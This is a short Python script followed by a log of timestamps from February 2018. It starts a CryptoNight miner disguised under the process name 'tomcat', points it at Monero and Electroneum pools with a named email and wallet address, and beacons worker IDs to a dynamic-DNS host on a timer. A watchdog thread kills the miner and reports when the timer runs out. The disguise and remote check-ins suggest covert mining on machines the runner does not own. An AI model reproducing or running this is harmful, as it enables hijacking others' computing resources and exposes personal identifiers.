import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:58:07.028321
#2018-02-17 16:45:07.768100
#2018-02-17 18:32:05.289009
#2018-02-17 20:20:07.849424
#2018-02-17 22:07:04.062090
#2018-02-17 23:51:06.761968
#2018-02-18 01:42:06.974317
#2018-02-18 03:29:01.568993
#2018-02-18 05:17:05.236403
#2018-02-18 07:09:06.346729
#2018-02-18 08:57:05.820478
#2018-02-18 10:44:03.602013
#2018-02-18 12:32:04.219402
#2018-02-18 14:19:04.140400
#2018-02-18 16:10:09.395034
#2018-02-18 17:57:05.685060
#2018-02-18 19:44:05.060866
#2018-02-18 21:31:02.083875
#2018-02-18 23:19:02.251099
#2018-02-19 01:07:07.414600
#2018-02-19 02:53:07.507039
#2018-02-19 04:41:02.154697
#2018-02-19 06:25:06.144954
#2018-02-19 08:14:04.031326
#2018-02-19 10:04:04.635361
#2018-02-19 11:53:08.284936
#2018-02-19 13:39:08.203516
#2018-02-19 15:26:01.293026
#2018-02-19 17:14:08.808324
#2018-02-19 19:02:08.683961
#2018-02-19 20:48:05.673484
#2018-02-19 22:37:07.020152
#2018-02-20 00:21:06.667723
#2018-02-20 02:15:03.854831
#2018-02-20 04:08:03.641615
#2018-02-20 05:53:01.384657
#2018-02-20 07:38:06.837844
#2018-02-20 09:23:02.016029
#2018-02-20 11:07:04.853838
#2018-02-20 12:54:04.315736
#2018-02-20 14:39:01.334336
#2018-02-20 16:24:10.843152
#2018-02-20 18:12:07.990659
#2018-02-20 20:03:06.698985
#2018-02-20 21:52:05.816446
#2018-02-20 23:34:04.265944
#2018-02-21 01:18:01.903539
#2018-02-21 03:07:05.557543
#2018-02-21 04:54:01.251170
#2018-02-21 06:41:07.070419
#2018-02-21 08:28:07.169805
#2018-02-21 10:16:06.865289
#2018-02-21 12:04:08.062261
#2018-02-21 13:53:12.933267
#2018-02-21 15:39:09.152275
#2018-02-21 17:32:09.270582
#2018-02-21 19:20:10.153685
#2018-02-21 21:08:06.254641
#2018-02-21 22:56:08.007296
#2018-02-22 00:46:01.828393
#2018-02-22 02:34:05.937873
#2018-02-22 04:20:01.332627
#2018-02-22 06:05:07.468838
#2018-02-22 07:51:03.448091
#2018-02-22 09:40:01.353995
#2018-02-22 11:27:05.632231
#2018-02-22 13:14:01.439597
#2018-02-22 15:03:06.975853
#2018-02-22 16:47:06.615605
#2018-02-22 18:33:06.469739
#2018-02-22 20:26:06.386726
#2018-02-22 22:12:01.359366
#2018-02-22 23:59:07.964731
#2018-02-23 01:47:04.399539
#2018-02-23 03:34:08.010894
#2018-02-23 05:18:07.417574
#2018-02-23 07:03:07.599079
#2018-02-23 08:53:08.081458
#2018-02-23 11:12:01.260703
#2018-02-23 13:06:01.831110
#2018-02-23 14:51:11.438228
#2018-02-23 16:40:11.588275
#2018-02-23 18:27:01.734641
#2018-02-23 20:13:08.310886
#2018-02-23 22:03:04.285236
#2018-02-23 23:51:07.679656
#2018-02-24 01:40:08.167958
#2018-02-24 03:28:06.129778
#2018-02-24 05:13:07.147723
#2018-02-24 07:01:05.205432
#2018-02-24 08:35:01.602503
#2018-02-24 10:09:05.066464
#2018-02-24 11:57:01.738110
#2018-02-24 13:22:04.522383
#2018-02-24 14:56:07.652280
#2018-02-24 16:29:07.283471
#2018-02-24 18:05:07.616926
#2018-02-24 19:33:03.800744
#2018-02-24 21:08:05.679650
#2018-02-24 23:15:09.468331
#2018-02-25 01:36:06.578317
#2018-02-25 04:51:01.619096
#2018-02-25 08:13:06.328012